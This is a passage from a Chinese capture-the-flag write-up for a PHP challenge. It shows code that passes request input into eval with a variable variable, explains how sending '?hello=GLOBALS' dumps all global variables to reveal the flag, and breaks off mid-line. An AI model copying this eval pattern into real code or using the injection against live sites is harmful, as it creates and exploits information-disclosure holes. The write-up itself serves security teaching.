0x00 爆破-1
<?php
include "flag.php";
$a = @$_REQUEST['hello'];
if(!preg_match('/^\w*$/',$a )){
die('ERROR');
}
eval("var_dump($$a);");
show_source(__FILE__);
?>
这个代码的意义是如果匹配正则/^\w*$/
,就打印变量$$a
。
由于$a
在函数中,所以函数之外无法访问。如果要访问,将hello修改为超全局变量GLOBALS
。
在URL后加?hello=GLOBALS
,将参数hello修改为Globals,实际执行代码是:
eval("var_dump($$a);")
eval("var_dump($hello);")
eval("var_dump(